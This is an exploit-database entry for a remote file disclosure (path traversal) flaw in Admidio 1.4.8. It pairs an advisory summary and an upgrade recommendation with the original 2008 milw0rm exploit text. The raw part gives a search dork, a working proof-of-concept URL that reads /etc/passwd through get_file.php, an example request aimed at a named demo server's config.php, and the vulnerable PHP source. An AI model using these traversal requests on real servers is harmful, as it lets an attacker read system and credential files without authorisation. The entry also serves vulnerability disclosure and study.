Admidio 1.4.8 Remote File Disclosure

vendor:

Admidio

by:

n3v3rh00d

7.5

CVSS

HIGH

Remote File Disclosure

CWE

Product Name: Admidio

Affected Version From: 1.4.2008

Affected Version To: 1.4.2008

Patch Exists: YES

Related CWE: N/A

CPE: a:admidio:admidio

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Admidio 1.4.8 Remote File Disclosure

Admidio 1.4.8 is vulnerable to a remote file disclosure vulnerability. An attacker can exploit this vulnerability to gain access to sensitive files on the server. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'file' parameter of the 'get_file.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This will allow the attacker to read arbitrary files on the server.

Mitigation:

Upgrade to the latest version of Admidio.

Source

Exploit-DB raw data:

/---------------------------------------------------------------\
+                                				+
+        	Admidio 1.4.8 Remote File Disclosure            +
+                                				+
\---------------------------------------------------------------/


[*] Author    : n3v3rh00d, http://forum.antichat.ru

[*] Download    : http://prdownloads.sourceforge.net/admidio/admidio-1.4.8.zip

[*] Bug Type    : Remote File Disclosure

[*] Dork    : "Admidio Team"

[*] POC        : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=

[*] Example    : http://demo.admidio.org/adm_program/modules/download/get_file.php?folder=&file=../../adm_config/config.php&default_folder=

[*] Source    :
    ..........................................................

    $file   = strStripTags(urldecode($_GET['file']));
    $act_folder     = "../../../adm_my_files/download";

    ..........................................................

    $file_name   = "$act_folder/$file";
    $file_length = filesize("$act_folder/$file");
    
    ..........................................................
    
    header("Content-Type: application/octet-stream");
    header("Content-Length: $file_length");
    header("Content-Disposition: attachment; filename=\"$file\"");

    header('Cache-Control: private');
    readfile($file_name);

# milw0rm.com [2008-05-09]